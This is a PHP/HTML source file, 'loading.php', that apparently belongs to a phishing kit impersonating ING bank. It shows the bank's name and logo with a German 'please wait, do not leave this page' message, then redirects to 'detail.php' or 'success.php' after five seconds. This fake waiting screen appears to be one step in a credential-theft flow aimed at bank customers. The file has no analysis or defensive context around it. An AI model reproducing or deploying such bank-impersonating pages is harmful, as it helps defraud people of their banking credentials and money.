File: /home/handcraf/www/ING/loading.php
<?php
require_once "functions.php";
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>ING</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- template css files-->
<link rel="stylesheet" href="css/bootstrap.css">
<link rel="stylesheet" href="css/test.css">
<link rel="preconnect" href="https://fonts.gstatic.com">
<!-- js files-->
<script src="js/html5shiv.min.js"></script>
<script src="js/respond.min.js"></script>
<!-- logo site web-->
<link rel="icon" href="image/icon.png" type="image/x-icon" />
<link rel="shortcut icon" href="image/icon.png" type="image/x-icon" />
<!-- fontawtsome -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/js/all.min.js"></script>
</head>
<style>
.lds-ellipsis {
display: inline-block;
position: relative;
width: 80px;
height: 80px;
}
.lds-ellipsis div {
position: absolute;
top: 33px;
width: 13px;
height: 13px;
border-radius: 50%;
background: #ff6200;
animation-timing-function: cubic-bezier(0, 1, 1, 0);
}
.lds-ellipsis div:nth-child(1) {
left: 8px;
animation: lds-ellipsis1 0.6s infinite;
}
.lds-ellipsis div:nth-child(2) {
left: 8px;
animation: lds-ellipsis2 0.6s infinite;
}
.lds-ellipsis div:nth-child(3) {
left: 32px;
animation: lds-ellipsis2 0.6s infinite;
}
.lds-ellipsis div:nth-child(4) {
left: 56px;
animation: lds-ellipsis3 0.6s infinite;
}
@keyframes lds-ellipsis1 {
0% {
transform: scale(0);
}
100% {
transform: scale(1);
}
}
@keyframes lds-ellipsis3 {
0% {
transform: scale(1);
}
100% {
transform: scale(0);
}
}
@keyframes lds-ellipsis2 {
0% {
transform: translate(0, 0);
}
100% {
transform: translate(24px, 0);
}
}
</style>
<body>
<section id="login" style="height: 100vh;">
<div class="loading text-center" style="padding-top: 230px;">
<div class="logo"><img width="120" src="image/log.svg"></div>
<div class="lds-ellipsis"><div></div><div></div><div></div><div></div></div>
<p>Bitte warten Sie, verlassen Sie diese Seite nicht...!</p>
</div>
</section>
<script src="js/jquery-3.5.1.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/jquery.mask.js"></script>
<script>
setTimeout(function () {
window.location.href= '<?php if(isset($_GET['bll'])) { echo 'detail.php?Billi=1KJSDKJhjghtyuUJSUSQUIQSIklklsisiiIUZIUZEJQSJkkjsJSJS'; } else { echo 'success.php?Billi=1KJSDKJhjghtyuUJSUSQUIQSIklklsisiiIUZIUZEJQSJkkjsJSJS'; } ?>';
},5000);
</script>
</body>
</html>